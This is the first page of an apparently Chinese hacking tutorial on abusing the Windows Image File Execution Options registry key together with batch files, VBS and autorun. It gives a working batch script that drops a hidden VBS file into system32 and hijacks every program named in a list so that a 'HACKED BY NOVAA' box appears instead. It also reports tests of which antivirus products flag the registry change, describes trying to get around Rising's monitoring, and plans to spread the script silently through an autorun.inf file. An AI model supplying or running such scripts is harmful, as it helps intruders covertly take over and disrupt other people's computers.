|
这篇文章是关于像劫持,批处理,VBS和autorun的综合应用。测试这个思想的时候碰到了很多难题。在自己和朋友的帮助下还是写出来了。呵呵。
所谓的映像劫持(Image File Execution Options),位于注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options .到底这个东西是做什么的。就是当你运行一个程序的时候,实际运行的确实另外一个文件。比如你运行的是QQ。他实际出来的却是记事本。
我对卡巴。江名。瑞星。3个杀毒软件进行了测试。发现修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options下面的键值,只有瑞星会提示是不是允许修改。其他的可以任意玩。
那么能不能突破瑞星对这个注册表值的监控呢?
想结束瑞星的进程是不可能的了。除非用冰刃。(其他方法我不知道了。)但是用冰刃也太显眼了。我们要的就是不知不觉。看来对杀毒软件下手不太理想。只有想办法绕过监控了。开始我是打算重命名Image File Execution Options键下已经有的内容。事实证明了这方法行不通。瑞星照样提示是否允许修改。哎。你不准我修改你的键值。我就拿Image File Execution Options开刀。修改Image File Execution Options为其他的。成功了。!接着修改Image File Execution Options子键的内容。无论添加新值还是修改原值都一路顺风。哈哈。成功了。接着就是把换后的名字换回原来Image File Execution Options。空高兴一场。郁闷死了。换不回了。没得办法了。算了。还是不触犯瑞星好了。(瑞星只监测上面这个有没有添加,而不监测是否没有了某个。)
还是看怎么来玩映像劫持吧呢?看看我的军刀批处理吧。首先在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options里面添加一个项目。瑞星提示是否运行修改时候选择在重启之前都允许。这样是为了我后面批处理修改做铺垫。(其他杀毒软件就不需要这步,可以直接玩。)
先说下这个批处理要做到的功能。自动的把一个txt文档中所有的映像都给劫持了。只要你一运行程序。就会提示你被novaa黑了。(哈哈。只是开玩笑。具体想怎么样你决定了。同时,这个批处理要隐藏运行,这样才神不知鬼不觉。)
批处理代码是这样的。
| @echo off
set "Target=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
echo msgbox "HACKED BY NOVAA ",vbokonly,"NOVAA">c:\windows\system32\show.vbs
attrib +s +h +r c:\windows\system32\show.vbs
for /f "delims=" %%i in (List.txt) do (
reg add "%Target%\%%i" /v debugger /t REG_SZ /d \"c:\windows\system32\show.vbs\"
)
pause |
在写这段代码的时候遇到两个问题
1.是命令行参数太多了,容易出错。
这里我将HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options用Target来代替。
并且在用reg命令的时候加上引号“""”。
2.是添加项的值不能写入。那个双引号不行。无论我转义还是加2个双引号。请教朋友后发现用反斜杠可以(\"c:\windows\show.vbs\")。(其实不用引号也可以。这里是怕目录有空格。)
这样就可以了。只需要在同一目录下放新建一个List.txt文档。然后文档里面写入需要劫持的映像名就可以了(一行一个)。对于映像名称。我们掉出任务管理器。点击进程。就可以看到映像名称了。如果你不知道某个应用程序的映像名称,你就运行下了。然后任务管理器里面记录映像名字。
好了。这下可以了。但是如何能神不知鬼不觉的让他运行呢,?
大家知道autorun病毒吧。哈哈。就是他了。
autorun.inf的格式是这样的
[autorun]
open=novaa.bat
icon=novaa.ico
上面这个autorun在我开启了自动播放后试了很多回。但是图标可以显示成功。但就是不运行批处理文件。起初以为是不能运行BAT格式的。但是查资料却说BAT格式可以。我用BAT转EXE的工具讲bat转换后还是不行。后来怀疑是杀软作怪。于是在虚拟机做试验。还是不执行。(我猜EXE文件必须是PE格式的才能运行。)
[1] [2] 下一页 |
